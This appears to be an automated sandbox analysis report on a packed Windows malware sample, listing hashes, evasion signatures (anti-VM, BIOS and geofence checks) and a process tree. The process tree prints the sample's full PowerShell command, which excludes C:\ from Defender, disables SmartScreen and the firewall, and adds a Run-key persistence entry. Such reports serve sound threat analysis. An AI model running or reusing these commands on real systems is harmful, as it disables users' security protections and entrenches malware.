Analysis
-
max time kernel
162s -
max time network
178s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
25-07-2022 17:10
Behavioral task
behavioral1
Sample
550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Resource
win10v2004-20220721-en
General
-
Target
550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
-
Size
3.5MB
-
MD5
57324b12506033d137a0ad82d2499c81
-
SHA1
6664dda28b289251ab23f16f7955f97978208fa7
-
SHA256
550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80
-
SHA512
d514ff8dda74f4af8645ab950b3ff6bd4e0a9432b9614a9fef4953a56b2bbd6535556ef9b6129df1099b7c93cafb682ad50db773ea6bc7db48279165b67fe2d1
Malware Config
Signatures
-
Modifies security service 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" powershell.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe -
Processes:
resource yara_rule behavioral2/memory/3920-130-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp themida behavioral2/memory/3920-131-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp themida behavioral2/memory/3920-132-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp themida behavioral2/memory/3920-133-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp themida behavioral2/memory/3920-135-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp themida behavioral2/memory/3920-142-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp themida -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe" powershell.exe -
Processes:
550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exepid process 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1484 3920 WerFault.exe 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exe550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exepid process 3460 powershell.exe 3460 powershell.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3460 powershell.exe Token: SeBackupPrivilege 3460 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exepowershell.exedescription pid process target process PID 3920 wrote to memory of 3460 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe powershell.exe PID 3920 wrote to memory of 3460 3920 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe powershell.exe PID 3460 wrote to memory of 1016 3460 powershell.exe netsh.exe PID 3460 wrote to memory of 1016 3460 powershell.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe"C:\Users\Admin\AppData\Local\Temp\550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)2⤵
- Modifies security service
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3920 -s 20042⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 3920 -ip 39201⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1016-140-0x0000000000000000-mapping.dmp
-
memory/3460-137-0x0000000000000000-mapping.dmp
-
memory/3460-141-0x00007FFF745E0000-0x00007FFF750A1000-memory.dmpFilesize
10.8MB
-
memory/3460-139-0x00007FFF745E0000-0x00007FFF750A1000-memory.dmpFilesize
10.8MB
-
memory/3460-138-0x0000024CB00C0000-0x0000024CB00E2000-memory.dmpFilesize
136KB
-
memory/3920-133-0x00007FF751DB0000-0x00007FF75270E000-memory.dmpFilesize
9.4MB
-
memory/3920-136-0x00007FFF92DD0000-0x00007FFF92FC5000-memory.dmpFilesize
2.0MB
-
memory/3920-135-0x00007FF751DB0000-0x00007FF75270E000-memory.dmpFilesize
9.4MB
-
memory/3920-134-0x00007FFF92DD0000-0x00007FFF92FC5000-memory.dmpFilesize
2.0MB
-
memory/3920-130-0x00007FF751DB0000-0x00007FF75270E000-memory.dmpFilesize
9.4MB
-
memory/3920-132-0x00007FF751DB0000-0x00007FF75270E000-memory.dmpFilesize
9.4MB
-
memory/3920-131-0x00007FF751DB0000-0x00007FF75270E000-memory.dmpFilesize
9.4MB
-
memory/3920-142-0x00007FF751DB0000-0x00007FF75270E000-memory.dmpFilesize
9.4MB
-
memory/3920-143-0x00007FFF92DD0000-0x00007FFF92FC5000-memory.dmpFilesize
2.0MB